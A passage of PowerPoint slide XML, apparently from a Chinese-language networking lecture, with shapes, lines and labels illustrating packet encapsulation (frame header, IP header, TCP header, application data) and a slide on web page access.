              <a:off x="4860" y="3046"/>
              <a:ext cx="708" cy="218"/>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1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>应用数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55309" name="Text Box 52"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4369" y="3046"/>
              <a:ext cx="491" cy="218"/>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1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>TCP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>头</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55310" name="Text Box 53"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3918" y="3046"/>
              <a:ext cx="451" cy="218"/>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1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>IP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>头</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55311" name="Text Box 54"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3408" y="3046"/>
              <a:ext cx="510" cy="218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B0F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1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>帧头</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Line 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3352800"/>
            <a:ext cx="0" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="3886200"/>
            <a:ext cx="0" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="2743200"/>
            <a:ext cx="0" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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58"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6781800" y="4114800"/>
            <a:ext cx="0" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="sq">
            <a:solidFill>
              <a:schemeClr val="fo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strips(down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strips(down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strips(downRight)">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strips(downRight)">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27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="3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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网页访问</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56323" name="Group 1027"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="2133600"/>
            <a:ext cx="450850" cy="525463"/>
            <a:chOff x="4803" y="1376"/>
            <a:chExt cx="284" cy="331"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="56418" name="Group 1028"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4809" y="1382"/>
              <a:ext cx="278" cy="325"/>
              <a:chOff x="4809" y="1382"/>
              <a:chExt cx="278" cy="325"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56432" name="Freeform 1029"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4816" y="1550"/>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3" name="Freeform 1030"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4816" y="1550"/>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4" name="Freeform 1031"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4856" y="1382"/>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5" name="Freeform 1032"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4856" y="1382"/>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6" name="Rectangle 1033"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4856" y="1404"/>
                <a:ext cx="18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37" name="Rectangle 1034"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4818" y="1580"/>
                <a:ext cx="261" cy="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38" name="Rectangle 1035"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4873" y="1423"/>
                <a:ext cx="151" cy="1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39" name="Line 1036"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="4996" y="1608"/>
                <a:ext cx="62"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6440" name="Group 1037"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4809" y="1659"/>
                <a:ext cx="278" cy="48"/>
                <a:chOff x="4809" y="1659"/>
                <a:chExt cx="278" cy="48"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="56441" name="Freeform 1038"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4809" y="1659"/>
                  <a:ext cx="278" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 278"/>
                    <a:gd name="T1" fmla="*/ 36 h 36"/>
                    <a:gd name="T2" fmla="*/ 33 w 278"/>
                    <a:gd name="T3" fmla="*/ 0 h 36"/>
                    <a:gd name="T4" fmla="*/ 246 w 278"/>
                    <a:gd name="T5" fmla="*/ 0 h 36"/>
                    <a:gd name="T6" fmla="*/ 278 w 278"/>
                    <a:gd name="T7" fmla="*/ 36 h 36"/>
                    <a:gd name="T8" fmla="*/ 0 w 278"/>
                    <a:gd name="T9" fmla="*/ 36 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 278"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 278 w 278"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="278" h="36">
                      <a:moveTo>
                        <a:pt x="0" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="3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42" name="Freeform 1039"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4809" y="1659"/>
                  <a:ext cx="278" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 278"/>
                    <a:gd name="T1" fmla="*/ 36 h 36"/>
                    <a:gd name="T2" fmla="*/ 33 w 278"/>
                    <a:gd name="T3" fmla="*/ 0 h 36"/>
                    <a:gd name="T4" fmla="*/ 246 w 278"/>
                    <a:gd name="T5" fmla="*/ 0 h 36"/>
                    <a:gd name="T6" fmla="*/ 278 w 278"/>
                    <a:gd name="T7" fmla="*/ 36 h 36"/>
                    <a:gd name="T8" fmla="*/ 0 w 278"/>
                    <a:gd name="T9" fmla="*/ 36 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 278"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 278 w 278"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="278" h="36">
                      <a:moveTo>
                        <a:pt x="0" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="3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43" name="Rectangle 1040"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4811" y="1693"/>
                  <a:ext cx="27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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="56419" name="Group 1041"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4803" y="1376"/>
              <a:ext cx="277" cy="325"/>
              <a:chOff x="4803" y="1376"/>
              <a:chExt cx="277" cy="325"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56420" name="Freeform 1042"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4809" y="1544"/>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21" name="Freeform 1043"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4809" y="1544"/>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22" name="Freeform 1044"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4849" y="1376"/>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23" name="Freeform 1045"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4849" y="1376"/>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24" name="Rectangle 1046"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4849" y="1398"/>
                <a:ext cx="185" cy="16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25" name="Rectangle 1047"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4811" y="1574"/>
                <a:ext cx="261" cy="73"/>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26" name="Rectangle 1048"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4866" y="1417"/>
                <a:ext cx="151"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27" name="Line 1049"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="4990" y="1602"/>
                <a:ext cx="6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6428" name="Group 1050"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4803" y="1653"/>
                <a:ext cx="277" cy="48"/>
                <a:chOff x="4803" y="1653"/>
                <a:chExt cx="277" cy="48"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="56429" name="Freeform 1051"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4803" y="1653"/>
                  <a:ext cx="277" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 277"/>
                    <a:gd name="T1" fmla="*/ 36 h 36"/>
                    <a:gd name="T2" fmla="*/ 32 w 277"/>
                    <a:gd name="T3" fmla="*/ 0 h 36"/>
                    <a:gd name="T4" fmla="*/ 245 w 277"/>
                    <a:gd name="T5" fmla="*/ 0 h 36"/>
                    <a:gd name="T6" fmla="*/ 277 w 277"/>
                    <a:gd name="T7" fmla="*/ 36 h 36"/>
                    <a:gd name="T8" fmla="*/ 0 w 277"/>
                    <a:gd name="T9" fmla="*/ 36 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 277"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 277 w 277"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="277" h="36">
                      <a:moveTo>
                        <a:pt x="0" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="32" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="245" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="277" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>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0" name="Freeform 1052"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4803" y="1653"/>
                  <a:ext cx="277" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 277"/>
                    <a:gd name="T1" fmla="*/ 36 h 36"/>
                    <a:gd name="T2" fmla="*/ 32 w 277"/>
                    <a:gd name="T3" fmla="*/ 0 h 36"/>
                    <a:gd name="T4" fmla="*/ 245 w 277"/>
                    <a:gd name="T5" fmla="*/ 0 h 36"/>
                    <a:gd name="T6" fmla="*/ 277 w 277"/>
                    <a:gd name="T7" fmla="*/ 36 h 36"/>
                    <a:gd name="T8" fmla="*/ 0 w 277"/>
                    <a:gd name="T9" fmla="*/ 36 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 277"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 277 w 277"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="277" h="36">
                      <a:moveTo>
                        <a:pt x="0" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="32" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="245" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="277" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>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31" name="Rectangle 1053"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4804" y="1687"/>
                  <a:ext cx="275"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grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56324" name="Group 1054"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2057400"/>
            <a:ext cx="1600200" cy="762000"/>
            <a:chOff x="4099" y="1858"/>
            <a:chExt cx="496" cy="433"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="56404" name="Group 1055"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4099" y="1858"/>
              <a:ext cx="496" cy="433"/>
              <a:chOff x="4099" y="1858"/>
              <a:chExt cx="496" cy="433"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56407" name="Oval 1056"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4217" y="1858"/>
                <a:ext cx="212" cy="117"/>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08" name="Freeform 1057"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4399" y="1891"/>
                <a:ext cx="141" cy="106"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 81 w 141"/>
                  <a:gd name="T1" fmla="*/ 6 h 106"/>
                  <a:gd name="T2" fmla="*/ 52 w 141"/>
                  <a:gd name="T3" fmla="*/ 0 h 106"/>
                  <a:gd name="T4" fmla="*/ 28 w 141"/>
                  <a:gd name="T5" fmla="*/ 6 h 106"/>
                  <a:gd name="T6" fmla="*/ 9 w 141"/>
                  <a:gd name="T7" fmla="*/ 14 h 106"/>
                  <a:gd name="T8" fmla="*/ 4 w 141"/>
                  <a:gd name="T9" fmla="*/ 23 h 106"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 31 h 106"/>
                  <a:gd name="T12" fmla="*/ 0 w 141"/>
                  <a:gd name="T13" fmla="*/ 39 h 106"/>
                  <a:gd name="T14" fmla="*/ 2 w 141"/>
                  <a:gd name="T15" fmla="*/ 50 h 106"/>
                  <a:gd name="T16" fmla="*/ 7 w 141"/>
                  <a:gd name="T17" fmla="*/ 61 h 106"/>
                  <a:gd name="T18" fmla="*/ 14 w 141"/>
                  <a:gd name="T19" fmla="*/ 70 h 106"/>
                  <a:gd name="T20" fmla="*/ 33 w 141"/>
                  <a:gd name="T21" fmla="*/ 87 h 106"/>
                  <a:gd name="T22" fmla="*/ 60 w 141"/>
                  <a:gd name="T23" fmla="*/ 100 h 106"/>
                  <a:gd name="T24" fmla="*/ 88 w 141"/>
                  <a:gd name="T25" fmla="*/ 106 h 106"/>
                  <a:gd name="T26" fmla="*/ 115 w 141"/>
                  <a:gd name="T27" fmla="*/ 100 h 106"/>
                  <a:gd name="T28" fmla="*/ 132 w 141"/>
                  <a:gd name="T29" fmla="*/ 92 h 106"/>
                  <a:gd name="T30" fmla="*/ 139 w 141"/>
                  <a:gd name="T31" fmla="*/ 84 h 106"/>
                  <a:gd name="T32" fmla="*/ 141 w 141"/>
                  <a:gd name="T33" fmla="*/ 75 h 106"/>
                  <a:gd name="T34" fmla="*/ 141 w 141"/>
                  <a:gd name="T35" fmla="*/ 67 h 106"/>
                  <a:gd name="T36" fmla="*/ 141 w 141"/>
                  <a:gd name="T37" fmla="*/ 56 h 106"/>
                  <a:gd name="T38" fmla="*/ 136 w 141"/>
                  <a:gd name="T39" fmla="*/ 45 h 106"/>
                  <a:gd name="T40" fmla="*/ 129 w 141"/>
                  <a:gd name="T41" fmla="*/ 36 h 106"/>
                  <a:gd name="T42" fmla="*/ 108 w 141"/>
                  <a:gd name="T43" fmla="*/ 20 h 106"/>
                  <a:gd name="T44" fmla="*/ 81 w 141"/>
                  <a:gd name="T45" fmla="*/ 6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1"/>
                  <a:gd name="T70" fmla="*/ 0 h 106"/>
                  <a:gd name="T71" fmla="*/ 141 w 141"/>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1" h="106">
                    <a:moveTo>
                      <a:pt x="81" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="52" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56409" name="Freeform 1058"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4473" y="1991"/>
                <a:ext cx="122" cy="117"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 82 w 122"/>
                  <a:gd name="T1" fmla="*/ 9 h 117"/>
                  <a:gd name="T2" fmla="*/ 58 w 122"/>
                  <a:gd name="T3" fmla="*/ 0 h 117"/>
                  <a:gd name="T4" fmla="*/ 34 w 122"/>
                  <a:gd name="T5" fmla="*/ 3 h 117"/>
                  <a:gd name="T6" fmla="*/ 14 w 122"/>
                  <a:gd name="T7" fmla="*/ 12 h 117"/>
                  <a:gd name="T8" fmla="*/ 2 w 122"/>
                  <a:gd name="T9" fmla="*/ 28 h 117"/>
                  <a:gd name="T10" fmla="*/ 0 w 122"/>
                  <a:gd name="T11" fmla="*/ 39 h 117"/>
                  <a:gd name="T12" fmla="*/ 0 w 122"/>
                  <a:gd name="T13" fmla="*/ 50 h 117"/>
